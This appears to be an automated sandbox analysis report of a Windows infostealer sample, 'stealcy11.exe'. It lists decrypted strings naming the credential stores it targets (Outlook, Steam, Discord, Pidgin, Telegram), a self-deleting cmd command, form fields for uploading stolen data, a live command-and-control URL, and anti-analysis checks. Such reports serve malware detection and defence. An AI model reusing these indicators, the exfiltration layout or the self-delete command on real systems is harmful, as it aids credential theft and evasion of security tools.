                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: F8806DD0C461824F*
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Telegram
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Tox
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: *.tox
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: *.ini
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Password
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: 00000001
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: 00000002
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: 00000003
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: 00000004
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \Outlook\accounts.txt
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Pidgin
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \.purple\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: accounts.xml
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: dQw4w9WgXcQ
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: token:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Software\Valve\Steam
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SteamPath
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \config\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: ssfn*
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: config.vdf
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: DialogConfig.vdf
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: libraryfolders.vdf
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: loginusers.vdf
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \Steam\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: sqlite3.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: done
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: soft
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \Discord\tokens.txt
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: https
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: POST
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: HTTP/1.1
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: hwid
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: build
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: token
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: file_name
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: file
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: message
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: screenshot.jpg
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E4B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,0_2_008E4B80
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_00904090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00904090
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E7690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_008E7690
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E6000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,0_2_008E6000
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E9B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_008E9B80
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E9BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_008E9BE0
                  Source: stealcy11.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: stealcy11.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: https:/135.181.65.216/ee45b7c5e4cb75cb.php
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49712 -> 135.181.65.216:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E56C0 lstrcpy,lstrlenA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,memcpy,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_008E56C0
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.65.216
                  Source: stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.65.216/
                  Source: stealcy11.exe, 00000000.00000002.1847814103.000000000110F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.65.216/W
                  Source: stealcy11.exe, 00000000.00000002.1847814103.000000000110F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://135.181.65.216/z
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E97A0 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,0_2_008E97A0
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: String function: 008E4980 appears 316 times
                  Source: C:\Users\user\Desktop\stealcy11.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1384
                  Source: stealcy11.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_009046C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_009046C0
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7784
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0c254e9b-4ef5-48a0-bc2a-e3c304dc47dcJump to behavior
                  Source: stealcy11.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\stealcy11.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: stealcy11.exeReversingLabs: Detection: 60%
                  Source: stealcy11.exeVirustotal: Detection: 56%
                  Source: unknownProcess created: C:\Users\user\Desktop\stealcy11.exe "C:\Users\user\Desktop\stealcy11.exe"
                  Source: C:\Users\user\Desktop\stealcy11.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1384
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: stealcy11.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_009063C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009063C0
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_009063C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009063C0
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5657
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: stealcy11.exe, 00000000.00000002.1847814103.0000000001123000.00000004.00000020.00020000.00000000.sdmp, stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\stealcy11.exeAPI call chain: ExitProcess graph end nodegraph_0-5436
                  Source: C:\Users\user\Desktop\stealcy11.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E5570 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,memcpy,InternetReadFile,LdrInitializeThunk,InternetCloseHandle,InternetCloseHandle,0_2_008E5570
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E4980 VirtualProtect 00000000,00000004,00000100,?0_2_008E4980
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_009063C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009063C0
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_009063C0 mov eax, dword ptr fs:[00000030h]0_2_009063C0
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_009028B0 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,0_2_009028B0
                  Source: C:\Users\user\Desktop\stealcy11.exeMemory protected: page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: stealcy11.exe PID: 7784, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_009046C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_009046C0
                  Source: C:\Users\user\Desktop\stealcy11.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_00903E10 lstrcpy,lstrcpy,GetSystemTime,0_2_00903E10
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_009029E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_009029E0
                  Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
